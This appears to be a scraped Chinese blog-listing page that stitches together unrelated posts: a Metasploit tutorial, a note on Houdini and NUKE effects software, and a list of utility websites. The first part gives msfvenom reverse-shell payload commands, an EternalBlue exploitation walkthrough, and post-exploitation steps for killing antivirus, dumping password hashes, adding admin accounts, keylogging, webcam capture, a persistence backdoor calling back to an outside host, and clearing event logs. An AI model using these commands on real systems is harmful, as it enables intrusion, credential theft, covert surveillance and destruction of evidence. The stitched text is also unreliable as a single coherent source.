       保存payload-v, --var-name             指定一个自定义的变量,以确定输出格式    --shellest                   最小化生成payload-h, --help                       查看帮助选项    --help-formats               查看msf支持的输出格式列表
    查看支持的payload列表:msfvenom -l payloads查看支持的输出文件类型:msfvenom --help-formats查看支持的编码方式:(为了达到免杀的效果):msfvenom -l encoders查看支持的空字段模块:(为了达到免杀的效果):msfvenom -l nops

    简单payload使用

    Linux:

    反向连接:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=< Port to Connect On> -f elf > shell.elf正向连接:msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f elf > shell.elf

    Windows:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f exe > shell.exe

    PHP:

    msfvenom -p php/meterpreter_reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '' > shell.php && pbpaste >> shell.php

    ASP:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f asp > shell.asp

    Python:

    msfvenom -p cmd/unix/reverse_python LHOST=< IP Address> LPORT=< Port to Connect On> -f raw > shell.py

    msfconsole(命令行)

    339a3c3b9563502d904f9f6aa45b6d9c.png

    这个界面可看到metasploit当前版本,各个模块的插件数量。

    • auxiliary扫描模块
    • exploits漏洞利用模块
    • payloads
    • encoders编码模块
    • nops空字符模块
    • psot模块
    • evasion模块(创建反杀毒软件的木马)

    命令行可输入search寻找利用模块

    msf5 > search MS17_010
    3601ae4c0397a2f24d3c1a9268052c3c.png

    常用的payload

    Linux:

    linux/x86/meterpreter/reverse_tcplinux/x86/meterpreter/bind_tcplinux/x86/shell_bind_tcplinux/x86/shell_reverse_tcplinux/x64/shell_reverse_tcplinux/x64/shell_bind_tc

    Windows:

    windows/meterpreter/reverse_tcpwindows/meterpreter/bind_tcpwindows/shell_reverse_tcpwindows/shell_bind_tcpwindows/x64/meterpreter/reverse_tcpwindows/x64/meterpreter/bind_tcpwindows/x64/shell_reverse_tcpwindows/x64/shell_bind_tcp

    MS17_010 Eternal bule(永恒之蓝)

    下面用永恒之蓝演示一下

    进入msfconsole search命令搜索MS17_010

    af84e627b43e4af67b4a777896da16cf.png

    搜索到相应的五个模块

    使用第二个辅助模块来帮助我们探测哪些主机存在漏洞 输入此命令

    msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) >

    查看所需要的配置信息:show options

    ce5f430bcf31989b42e639b83641a1f4.png

    使用RHOSTS 参数 来查询指定IP范围内的主机是否存在漏洞 然后输入exploit进行探测

    c7d62b88751bb94ba0e4d8d79ce5e7d7.png

    看扫描结果 我内网连的主机少 结果前面如果是+,说明这台主机存在漏洞

    之后就可以使用漏洞利用模块了 输入命令 输入info查看漏洞信息

    msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalbluemsf5 exploit(windows/smb/ms17_010_eternalblue) > info
    1fafafa095bba2e9044ae02386bcdf4a.png

    查看payloads 命令:show payloads

    2ff3aba9073a6438e5c2fbbf73b699ad.png

    可以看到很多payload 自己根据当时情况使用哪个payload 想用哪个用哪个

    设置payload 然后查看参数

    4d032647af4ff03d2ef00b1e5674b786.png

    RHOSTS 设置要攻击的主机IP ;LHOSTS 设置自己的IP 用于接收反弹回来的shell,默认4444端口监听 然后exploit开始攻击

    接下来就不演示了 说一下exploit攻击成功后的渗透的相关命令

    1.运行了exploit命令之后,就开启了一个reverse TCP监听器来监听本地的 4444 端口,攻击者的本地主机地址(LHOST)和端口号(LPORT)。运行成功之后,我们将会看到命令提示符 meterpreter > 出现,然后我们输入: shell 即可切换到目标主机的windows shell,要想从目标主机shell退出到 meterpreter ,我们只需输入:exit

    想要从meterpreter退到msf:background输入命令: sessions  -l       查看我们获得的shell输入命令:sysinfo   查看攻击目标主机的相关信息查看攻击目标主机是否在虚拟机上面运行:run post/windows/gather/checkvm关闭目标主机上运行的杀毒软件:run killav获取目标主机详细信息并保存到本地:run scraper关于文件的命令:             cd:切换目标目录;             cat:读取文件内容;             rm:删除文件;             edit:使用vim编辑文件             ls:获取当前目录下的文件;             mkdir:新建目录;             rmdir:删除目录关于上传文件和下载文件:                    upload file 向目标主机上传文件                    download file 在目标主机下载文件

    2.关于提高权限

    1.输入命令:getsystem  帮助我们提高权限(提示错误,但已经成功提权)2.命令:getuid  获取当前用户信息(查看是什么权限)

    3.获取目标主机用户名密码

    1.run windows/gather/credentials/windows_autologin 抓取自动登录用户的用户名和登录密码2.run hashdump  hashdump模块从SAM数据库导出本地用户(得到的密码哈希值可用 Jhon the Ripper来破解密码)

    4.关于目标主机里的程序

    1.run post/windows/gather/enum_applications  查看目标主机安装的应用程序2.execute 此命令可在目标系统中执行相关应用程序          execute  参数  -f 可执行文件          可选参数:          -f:指定可执行文件          -H:创建一个隐藏进程          -a:传递给命令的参数          -i:  跟进程进行交互          -m:从内存中执行          -t: 使用当前伪造的线程令牌运行进程          -s: 在给定会话中执行进程
    screenshot  目标主机屏幕截图 图片会保存到/root目录下

    5.创建新本地用户

    1.run post/windows/gather/enum_logged_on_users  查看当前主机已存在的用户2.run getgui -u username -p password  添加一个用户为username,密码为password的用户,然后添加到Administrators组中(如果添加失败,可以使用之前execute命令运行cmd窗口手动将用户添加到Administrators组中)

    6.关于远程桌面

    首先确保目标主机开启了远程桌面功能

    1.idletime  先检查主机远程用户的空闲时长2.run getgui -e3.run post/windows/manage/enable_rdp  以上两个命令都可开启目标主机远程桌面功能

    7.关于记录键盘

    1.keyscan_start:开启键盘记录功能2.keyscan_dump:显示捕捉到的键盘记录信息3.keyscan_stop:停止键盘记录功能

    8.关于绑定进程实现meterpreter持久化

    ps      查看目标设备中运行的进程 getpid  查看我们当前运行的进程id migrate  命令来绑定目标进程id(后面跟要绑定进程的id即可) run post/windows/manage/migrate 此命令会自动寻找合适的教=进程然后换绑定进程

    9.关于目标主机的摄像头

    webcam_list     获取目标主机的摄像头列表webcam_snap     从指定的摄像头拍摄照片webcam_stream   从指定的摄像头开启视频

    10.关于留后门

    如果目标主机关机,meterpreter建立的连接就会断开

    所以我们可以在目标主机系统内留下一个持续性的后门,只要目标主机开机,我们就可以连接到该主机

    通过添加服务到注册表 之后只要开机就会自动启动并连接

    run persistence -X -i 8 -p 6666 -r 192.168.10.27  #反弹时间间隔是8s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀#运行之后它就在目标机新建了这个文件:C:WindowsTEMPCJzhFlNOWa.vbs  代表把该服务加入了注册表中,只要开机就会启动添加之后的连接就是在6666端口进行监听

    11.最后清除事件日志(拍拍屁股走人,要拍干净才能走哦)

    之前我们做的所有操作都会被记录在攻击的目标主机的系统日志文件之中,所以我们需要在完成攻击之后清除掉事件日志

    clearev  清除事件日志
    展开全文
  • python 制作影视动画、电影特效工具

    千次阅读 2019-10-06 23:19:03
    一直觉得电影特效,动画制作...Houdini (电影特效魔术师) Side Effects Software的旗舰级产品,是创建高级视觉效果的有效工具,因为它有横跨公司的整个产品线的能力,Houdini Master为那些想让电脑动画更加精彩的...

    一直觉得电影特效,动画制作这些都很什么,在google上搜索了下python开发电影特效的内容,发现了几个不错的软件,都支持python脚本开发.

    Houdini  

    Houdini (电影特效魔术师) Side Effects Software的旗舰级产品,是创建高级视觉效果的有效工具,因为它有横跨公司的整个产品线的能力,Houdini Master为那些想让电脑动画更加精彩的动画制作家们提供了空前的能力和工作效率。
    众所周知,Houdini是以灵活性及高效性著称的世界顶级视觉特效软件,而VEX编程语言则是Houdini灵活性的核心。VEX囊括了简洁、优美、高效等所有计算机语言的优点,帮助艺术家快速地实现普通节点连接能够或很难实现的视觉效果实现方案,可以说是Houdini特效艺术家居家必备之技能。
    
    Houdini是一款三维计算机图形软件,由加拿大Side Effects Software Inc.(简称SESI)公司开发,SESI公司由Kim Davidson和Greg Hermanovic创建于1987年。Houdini是在Prisms基础上重新开发而来,可运行于Linux, Windows, Mac OS等操作系统,是完全基于节点模式设计的产物,其结构、操作方式等和其它的三维软件有很大的差异。Houdini自带的渲染器是Mantra,基于Reyes渲染架构,因此也能够快速的渲染运动模糊、景深和置换效果。 Mantra是经过产品验证的成熟渲染器,可以满足电影级别的渲染要求。当然,Houdini也有第三方渲染器的接口,比如:RenderMan、Mental ray、Vray和Torque等,可以把场景导出到这些渲染引擎进行渲染。

     

    NUKE 

     

    视觉效果软件 当今大型电影绝伦的视效,不禁让人要惊叹其合成的逼真与强大!NUKE曾被用在Digital Domain所制作的很多电影和商业片中。NUKE 是由The Foundry公司研发的一数码节点式合成软件。已经过10年的历练,曾获得学院奖(Academy Award)。为艺术家们提供了创造具有高质素的相片效果的图像的方法。NUKE无需专门的硬件平台,但却能为艺术家提供组合和操作扫描的照片,视频板以及计算机生成的图像的灵活、有效、节约和全功能的工具。在数码领域,NUKE已被用于近百部影片和数以百计的商业和音乐电视,NUKE具有先进的将最终视觉效果与电影电视的其余部分无缝结合的能力,无论所需应用的视觉效果是什么风格或者有多复杂。

     

    学习python还可以玩转电影特效,影视合成,python的价值还需要更多人去开发发掘。

     

    转载于:https://www.cnblogs.com/fly-kaka/p/11579981.html

    展开全文
  • 省去专业性工具的复杂性操作,是影视作品类讲解配音、配字幕的利器。让普通人也可以制作影视讲解作品。 软件功能: 1、支持批量导入txt文案。 2、支持批量导入需要处理的视频。 3、支持添加背景音乐(为了不影响...

    在这里插入图片描述

    软件介绍:

    本软件主要用于视频批量添加配音,添加字幕,添加Logo,添加背景音乐等.比较适合影视讲解类作品。你仅需要准备好视频和需要讲解的txt文案内容,软件将自动帮你配音和字幕。软件操作难度极低,就像平时操作表格文件一样简单。省去专业性工具的复杂性操作,是影视作品类讲解配音、配字幕的利器。让普通人也可以制作影视讲解作品。
    

    软件功能:

    1、支持批量导入txt文案。
    
    2、支持批量导入需要处理的视频。
    
    3、支持添加背景音乐(为了不影响讲解配音效果背景音乐会减小一半,如果背景音乐还是过大,请使用第三方工具减小背景音乐的音量,以免影响配音效果)。
    
    4、支持添加文字Logo和图片Logo(支持动图)。
    
    5、支持多种配音讲解人。
    
    6、自动添加字幕(不需要手动添加)。
    

    软件截图:

    在这里插入图片描述

    软件下载地址:

    蓝奏云下载地址:lanzoux.com/b06g1ig9c

    微云下载地址:share.weiyun.com/X1bb7i9X

    展开全文
  • 秒杀全网!研发、运营必备实用工具网站

    万次阅读 多人点赞 2019-09-03 23:20:53
    网站:https://www.toolnb.com/ 11.2、菜鸟工具 最大的特点是支持各种语言的在线编辑,可以在网页上运行代码。 网站:https://c.runoob.com/ 11.3、PDF派 20个好用的PDF在线工具,包括PDF转换,PDF压缩,PDF合并...

    目录

    1、搜索引擎

    2、PPT

    3、图片操作

    4、文件共享

    5、招聘求职

    6、程序员面试题库

    7、办公、开发软件

    8、高清图片、视频素材网站 

    9、项目开源

    10、算法

    11、在线工具宝典大全

    12、音乐

    13、神辅助工具

    14、语音处理

    15、大数据

    16、电子书


    程序员开发需要具备良好的信息检索能力,为了备忘(收藏夹真是满了),将开发过程中常用的网站进行整理(不断更新中~)。

    拓展:让人眼前一亮,不明觉厉的互联网技术PPT


    1、搜索引擎

    1.1、秘迹搜索

    一款无敌有良心、无敌安全的搜索引擎,不会收集私人信息,保护私隐,没有Cookie,并且秘迹搜索聚合了百度、360、Bing、搜狗等搜索结果。

    网站:https://mijisou.com

    1.2、小白盘

    度盘资源搜索的网站,能够搜索电影、电视剧、小说、音乐等资源(注意:评论区很多小伙伴说小白盘有毒,我用谷歌浏览器搜索过几次并无大碍,请慎用!

    网站:https://www.xiaobaipan.com

    1.3、 DogeDoge搜索

    DogeDoge搜索,中文名多吉搜索,一个绝赞的民间高手开发的搜索引擎,传说完全可以替代百度搜索百度首页几乎都是广告,而 DogeDoge搜索一个广告都没有,搜索答案侧重于知乎、博客园、CSDN等,实在良心,搜索结果和谷歌差不多,非常适合那些无法科学上网的朋友。

    网站:https://www.dogedoge.com/

    1.4、GitLogs

    GitLogs 是GitHub网站的内容搜索引擎,可以帮助工程师们快速的找到相关的项目,同时也提供最新的开发项目、开发新闻、相关主题推荐等资源,支持邮箱订阅文章,每天都可以收到GitHub网站上的最新内容。

    网站:https://www.gitlogs.com/ 


    2、PPT

    2.1、优品PPT

    高品质免费PPT模板下载网站,比第一PPT质量高很多。

    网站:http://www.ypppt.com


    3、图片操作

    3.1、图片无限变大

    让你的图片无损放大,放大,再放大!只需要稍稍处理一下就可达到意想不到的效果。

    网站:http://bigjpg.com/zh

    3.2、waifu2x无损放大图片

    waifu2x 是一位来自日本的开发者所开源的项目,该项目利用人工智能深度卷积神经网络技术来无损放大图片,堪称是一款图片放大神器。一般图片在放大后可能会出现边界锯齿、线条模糊等问题,而 waifu2x 的算法对此提供了非常好的图片拉伸、降噪、填补机制,使得放大前后的图片给人观感基本一致。

    网站:http://waifu2x.udp.jp/index.zh-CN.html       GitHub源码:https://github.com/nagadomi/waifu2x

    3.3、Remove Image Background照片抠图和证件照换底色

    由 byteq 开发人员 Benjamin Groessing 所开发的 remove.bg 是一款基于 Python、Ruby 和深度学习的抠图工具,它通过 AI 技术自动识别前景层,然后将之与背景层分离开来。网站目前免费开放,无论你是专业设计师还是刚入行的运营小白,都可以上传照片实现自动抠图,免去选择、标记等一系列繁琐的常规操作。真是照片抠图和证件照换底色的绝佳利器。

    网站:https://www.remove.bg/      Python代码实现:https://handsome-man.blog.csdn.net/article/details/102025059

    3.4、稿定设计

    稿定设计是一款多场景商业视觉在线设计平台,提供操作简单、功能强大的在线服务,抠图简单高效,支持在线PS、人工智能抠图和证件换背景等操作。

    网站:https://www.uupoop.com/ 

    3.5、TinyPNG

    免费的在线图片压缩工具,压缩率高,无损画质,直接拖拽使用,独特且强悍的JavaScript 算法,能极速压缩 80% 的图片大小,而不损害其质量。

    网站:https://tinypng.com/

    3.6、SmartResize

    基于 JavaScript+HTML5 编写的一个批量裁剪缩放图片神器(适合简单的人工智能图像数据预处理)。

    网站:https://www.smartresize.com/zh-cn 

    3.7、GIF工具之家

    支持图片压缩、GIF压缩、视频转GIF、GIF合成以及GIF剪裁五大功能。

    网站:https://tool.gifhome.com/

    3.8、图片助手

    一款Chrome浏览器中用于嗅探、分析网页图片、图片筛选、下载等功能的扩展网页插件程序,安装插件之后,就会出现在浏览器上,一次性可以下载几百张图片素材。

    网站:http://www.pullywood.com/ImageAssistant/ 


    4、文件共享

    4.1、拷贝兔

    拷贝兔是款跨平台文件传输工具,能做到不同设备间文件或文本的临时性迅速分享的应用,支持Windows、Mac、Linux、iOS、Android平台互传;在线使用,用完即走。比百度网盘方便多了。

    网站:https://cp.anyknew.com

    4.2、firefox send

    火狐的一款私密文件分享工具。可以设置过期时间,设置多少次下载后就过期,还可以设置密码保护,做到链接到期即焚。

    网站:https://send.firefox.com/


    5、招聘求职

    5.1、应届生求职网

    为大学生提供全方位的求职服务,提供最全、最新、最准确的校园宣讲、全职招聘、兼职实习、知名企业校园招聘、现场招聘会等信息,并且为大学生提供针对性的求职就业指导。

    网站:http://s.yingjiesheng.com/


    6、程序员面试题库

    6.1、LeetCode(力扣)

    估计 leetcode(力扣)大家都很熟悉了,都被推荐烂了,很多国内外的程序员在上面刷题,难度从 Easy、Medium 至 Hard 都有,据说很多面试官都会从中挑选各种题目,号称大厂的筛码工。

    网站:https://leetcode-cn.com/

    6.2、hihoCoder

    网站的技术团队来自于原北大 POJ 的开发团队,至于 POJ 会在后面的篇章中介绍,反正膜拜就完事了。一些知名的大厂比如微软、百度、腾讯、网易等会在上面举办在线编程比赛,风格倒是和 ACM 比赛类似。hihoCoder 每周有周赛,每月有月赛。周赛是一道题,题目比较难但是极有意思,可以很好的拓宽自己的解题思路,月赛就更厉害了,题目均出自北大等一流高校玩 ACM 的菊苣出题,通过这个的检验可以迅速定位到自己真实的水平,同时了解自身在解决问题过程中的不足。

    网站:https://hihocoder.com/

    6.3、牛客网

    牛客网作为国内内容超级丰富的 IT 题库,各种东西看的我眼花缭乱,题库+面试+学习+求职+讨论 360 度无死角服务,堪称"互联网求职神器"。它好就好在不只是一个刷题的平台,还是一个交流学习的平台,发个问题贴总有热心的大佬帮助。

    网站:https://www.nowcoder.com/ 


    7、办公、开发软件

    7.1、我爱分享网

    分享各种常用软件安装包(配套破解软件),安装教程和自学视频,让小伙伴即时获取最新的软件,软件无忧,理工科必备利器!

    网站:http://www.zhanshaoyi.com/rjxz.html


    8、高清图片、视频素材网站 

    整理了一份实用性爆表的表格图像、视频、矢量……共35个网站,表中含有网站简介和素材类型,做PPT必备啊~

    关注公众号,发送关键字:素材表格,获取资源。


    9、项目开源

    9.1、GitHub

    GitHub是一个面向开源及私有软件项目的托管平台,因为只支持git 作为唯一的版本库格式进行托管,故名GitHub。

    作为开源代码库以及版本控制系统,Github拥有超过900万开发者用户。随着越来越多的应用程序转移到了云上,Github已经成为了管理软件开发以及发现已有代码的首选方法。(访问不稳定,经常需要翻墙)

    网站:https://github.com/ 

    9.2、开源中国

    开源中国成立于2008年8月,是目前国内最大的开源技术社区,拥有超过200万会员,形成了由开源软件库、代码分享、资讯、协作翻译、码云、众包、招聘等几大模块内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

    网站:https://www.oschina.net/ 

    9.3、码云

    码云是 OSCHINA.NET 推出的代码托管平台,支持 Git 和 SVN,提供免费的私有仓库托管。目前已有超过 350 万的开发者选择码云。

    网站:https://gitee.com/ 


    10、算法

    10.1、VisuAlgo

    VisuAlgo是2011年由Steven Halim博士所开发,其收录了许多高级的算法比如说图的遍历这部分,除了常规的深度优先算法与广度优先算法,还设计了深度优先算法的变形以及找割点,连接桥,和有向图中寻找强连接部分的Tarjan's与 Kosaraju的深度优先算法,目前网站支持中文,印尼文,日文等多语言版本。

    网站:https://visualgo.net/zh 

    数据结构、算法动画演示软件:百度网盘链接:https://pan.baidu.com/s/1GLXpfPm3txtrIA4HcxEO7g  提取码:m5vd 


    11、在线工具宝典大全

    11.1、爱资料工具

    爱资料在线工具,为开发运维提供全面的在线工具箱,目前已开发工具270款,包含开发工具、运维工具、常用工具、SEO站长工具等,是好用,方便的在线工具网站。

    网站:https://www.toolnb.com/ 

    11.2、菜鸟工具

    最大的特点是支持各种语言的在线编辑,可以在网页上运行代码。

    网站:https://c.runoob.com/ 

    11.3、PDF派

    20个好用的PDF在线工具,包括PDF转换,PDF压缩,PDF合并等,目前没有限制。

     网站:https://www.pdfpai.com/

    11.4、网易见外工作台

    用网易邮箱账号登陆,每天开放 2 小时的白嫖时间,新建一个项目,可以用来翻译视频,AI 自动生成中英文双语字幕,字幕翻译,文档翻译,图片文字识别,语音翻译等,每天快乐白嫖 2 小时,对于我们这种业余用的,足够了。

    网站:https://jianwai.youdao.com/ 

    11.5、TOOLFK在线工具人

    TOOLFK 是一个面对程序员的在线工具箱网站。包含 100 多种实用的工具,包含:程序在线运行、在线制作思维导图、在线网络爬虫、语音合成、PDF/PPT/Excel 文档转换加密工具、MarkDown 格式转换等。

    网站:https://www.toolfk.com/

    11.6、果汁排行榜

    果汁排行榜是一个集合了各类排行版的网站。分类有:热搜榜、热议榜、影视榜、音乐榜、摄影榜、设计榜、财富榜、产品热销排名、游戏榜、大数据等。无论是程序员,还是产品经理或者运营人员,利用好这个网站,都可以快速查询到某一分类的最热门的内容和产品。

    网站:http://guozhivip.com/rank/


    12、音乐

    12.1、MyFreeMP3

    现在QQ音乐、酷我音乐等各类平台听歌、下载都是收费的,例如我喜爱的周杰伦,很多歌曲都无法免费听了,MyFreeMP3网站支持所有音乐免费听、甚至可以直接免费下载。

     网站:http://tool.liumingye.cn/music/?page=homePage 

    12.2、小森平的免费下载音效

    一个日本小哥维护的网站,里面有大量的音效可以免费下载使用,包括日常生活、游戏、音乐等,做视频的伙伴的福利。

     网站:https://taira-komori.jpn.org/freesoundcn.html


    13、神辅助工具

    13.1、临时接收手机验证码

    注册一些不常用的网站时可以用这个网站的临时手机号接收验证码,这些号码都可以点击进去阅读短信,避免用自己真实号码经常收到骚扰短信。

    网站: https://www.materialtools.com/

    13.2、临时邮箱

    有时在有些网站需要填写邮箱登录,但我们可能只是一次性用下,这时如果你不想用你自己常用的邮箱注册,可以用这个临时邮箱,等你决定长久用这个网站了,再换成你自己的邮箱,这样就避免了信息干扰。

    邮箱可以持续 24 小时有效,可以任意设置邮箱名,随时更换邮箱,方便。

    网站:24mail.chacuo.net 


    14、语音处理

    14.1、蜜蜂剪辑

    可将不同格式视频/音频中语言提取成文字输出为TXT文本,文件没有大小限制。

    网站:https://beecut.cn/speech-to-text-online


    15、大数据

    15.1、大数据导航

    大数据导航这个网站,几乎覆盖了所有类型的数据及工具,相当实用。网站包含:数据搜索、互联网趋势分析、全球互联网数据、BI 商业智能、实时数据工具、短视频数据平台、教育数据、城市开放数据等。如果你从事数据相关的工作,收藏这个网站就够了。

    网站:http://hao.199it.com/

    15.2、Flourish

    Flourish 是一个非常好用的在线制作可视化数据的网站,不需要懂得代码就可以让数据动起来,更加直观地展示数据。它是一个在线制作的网站工具,只要操作者把数据文件(例如 Excel 文件)上传到该平台就可以轻松完成可视化的工作。

    在B站上经常可见Flourish的数据可视化应用。

    网站:https://flourish.studio/


    16、电子书

    16.1、熊猫搜书

    熊猫搜书是一个非常好用的电子书导航网站,一个网站相当于很多个网站

    它聚合了多达 20 多个高质量电子书网站,并且每个网站的质量都是非常高,它的界面简洁清新,你可以直接点击左侧切换网站。(目前由于某些原因,其中某些网站无法访问)

    网站:https://ebook.huzerui.com/#/

    展开全文
  • 这是彩云科技推出同声翻译软件《小译同传》,可在线翻译多国语言。实时把麦克风声音翻译为字幕,翻译系统声音为字幕(如来自你看的网络电影, 仅支持部分应用, 见使用说明) 传送门:...
  • 综上,动画艺术语言为历史题材纪录片提供了有力的创作工具,使其能够以更小的成本解决可视性材料缺乏的问题,为拓展题材、提高表现力提供了可能。虽然艺术语言带有主观虚拟性和假定性,但不能简单地认定运用动画...
  • 文章收集了本人、别人推荐的若干OA...1、网站快速成型工具: http://element-cn.eleme.io/#/zh-CN Element,一套为开发者、设计师和产品经理准备的基于 Vue 2.0 的桌面端组件库 2、在线词云图制作网站:https://wor...
  • 网页制作与HTML语言基本结构简介.ppt第三章网页制作与HTML语言基本结构简介 本章提要静态网页与动态网页DreamweaverMX制作网页HTML语言的基本结构 3 1网页制作概述 3 1 1静态网页与动态网页1 静态网页由超级文本标志...
  • 在任意网页上选中影视剧链接或者包含影视剧名称的文本后右键加载豆瓣电影工具版,双击图标即可在页面右侧显示豆瓣电影的评分及链接,是豆瓣电影用户的必备工具。访问豆瓣电影网站还能自动显示电影的IMDB评分
  • 可对接微信公众号开发者工具影视机器人系统),对接后微信用户可以通过回复关键字直接搜索相对应的影片进生点播。 5、图片延迟加载 网站前台图片列表采用图片按需加载技术,加快用户对网站的访问速度,同时也可以...
  • Paros工具使用手册

    2020-06-09 19:14:21
    Paros是一种利用纯java语言开发的安全漏洞扫描工具,它主要是为了满足那些需要对自己的web应用程序进行安全检测的应用者而设计的。通过Paros的本地代理,所有在客户端与服务器端之间的http和https数据信息,包括...
  • 该楼层疑似违规已被系统折叠隐藏此楼查看此楼-【人造语言的历史】-Constructed Language,简称Conlang,而玩Conlang的人则自称为Conlanger。中文将之译成人造语言或者人工语言,这个翻译其实有点问题诶,因为人类...
  • 所以这个值得收藏的工具系列中,我们将以较小的篇幅来分享图形图像处理的实用小工具,争取让大家在下车或者下地铁之前就能看完。男人的生产力工具 篇二百四十四:值得收藏的在线图片处理工具(三):自动消除图片...
  • 自然语言理解技术

    千次阅读 2010-03-08 20:56:00
    转自网络 研0802李长进 自然语言理解技术 自从互联网普及以后,人们难于获取信息的苦恼,很快就变为被过多、庞杂的信息包围的烦扰。虽然通过搜索引擎、目录、人工编辑的社区等工具,人们可以获得一定的辅助;但是...
  • 开源 项目管理工具 艺术家,工程师和黑客的共同点之一是他们对管理的反感 。 因此,当我们真正需要项目管理的时机到来时,这是一种痛苦的成长经历。 对于疯子! 动画开放电影项目,我们首先使用开源软件项目中流行...
  • java 开发工具及其他使用工具介绍

    千次阅读 2017-09-05 10:10:57
    Kolor Panotour Pro for Mac 是一款Mac平台的全景图片制作工具,是一款专业的虚拟全景游览图片制作工具。该软件界面直观,操作简单,只需几次点击即能完成所有操作。 Analog Efex Pro Image Processing ...
  • 引言:什么是html[本站原创] [连载教程系列] 《从html语言到网上家园》 第一回目 引言—第一章引言:什么是htmlhtml语言英文为hypertext marked language,翻译成中文是“超文本标记语言”。它是一种文本格式的文档...
  • 自然语言处理(NLP)中一个很重要的研究方向就是语义的情感分析(Sentiment Analysis)。例如IMDB上有很多关于电影的评论,那么我们就可以通过Sentiment Analysis来评估某部电影的口碑。本文演示利用Scikit Learn...
  • 动画电影视听语言

    千次阅读 2010-03-06 13:03:00
    我们把这个术语借用到影视艺术中来,意思是指按照一定的目的和程序把镜头组接起来,构成发生质的飞跃的完整的影视艺术作品。 蒙太奇的类型  a、叙述性蒙太奇  b、表现性蒙太奇  c、平行蒙太奇  d、交叉蒙太奇  ...
  • -- 录制视频 通过Camera采集NV21数据编码为H.264视频文件并保存; 通过Camera2采集YV12数据编码为H.264视频文件并保存; 通过SurfaceView解码显示Camera编码保存的H.264视频文件;... Android拍摄工具 AVS2高...
  • 项目名称:TubeHot(兔比影视网) 开发语言:Java、HTML、SQL 开发工具:eclipse、Dreamweaver 8、SQL2008
  • html语言

    2013-04-10 20:45:47
    15)贴影视文件:文件地址" width="宽度" height="高度" start=mouseover> 16)换行: 17)段落:段落 18)原始文字样式:正文 19)换帖子背景:背景图片地址"> 20)固定帖子背景不随...
  • MAX Script 脚本语言

    2012-12-19 10:15:00
    [导读]我们知道,使用3DStudioMAX4.0系统可以帮你轻而易举地创建复杂的场景,并让任何对象生成动画,是影视和广告设计中强大有力的工具。而3DStudioMAX4.0还具有友善的开发环境,借助其简单的脚本语言,即可自行扩展...
  • 第18章 超文本标记链接语言(HTML)

    万次阅读 2007-09-18 15:45:00
    HTML可用来编排文档、创建列表、建立链接、插入声音和影视片断。目前市场上已有很多很好的HTML编辑器可以用来编写多媒体文档。虽然编写多媒体文档不一定要直接使用HTML语言,但为了更好地理解和使用HTML编辑器,添加...
  • 计算机编程语言

    2013-08-14 14:33:10
    计算机编程语言多种多样,运用到的地方也千变万化,下面介绍一些经典的计算机汇编语言书籍。  《java面向对象bs后台开发精粹》介绍了通过java语言进行b/s服务器端后台开发的知识,全书主要内容包括java面向对象...
  • (本篇的话主要是语言类,文学类会另起一篇)写在前面的话:在给大家上公开课的时候我花了不小的篇幅来说明这一点,换成文字版,我依然想强调一下,就是“确定自己是否考研”。“考研”两个字说起来很简单,但是真正...
  • 对于经常使用手机,电脑来看视频...6. 影视特效支持 7. 支持在转换前进行预览 8. 转换过程非常快速 9. 支持批量处理 10. 操作简单,只需三步即可搞定 11. 多国语言支持。支持简体中文 12. 兼容最新 Windows 10 操作系统
  • 语言-汉语:汉语

    2019-05-16 15:50:00
    ylbtech-语言-汉语:汉语 汉语,即汉族的传统语言,是中国通用语言,国际通用语言之一,属汉藏语系,与藏语、壮语、侗语、黎语、彝语、苗语、瑶语等都是亲属语言。 汉语历史悠久,使用人数最多,世界上使用...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,436
精华内容 1,774
关键字:

影视语言的工具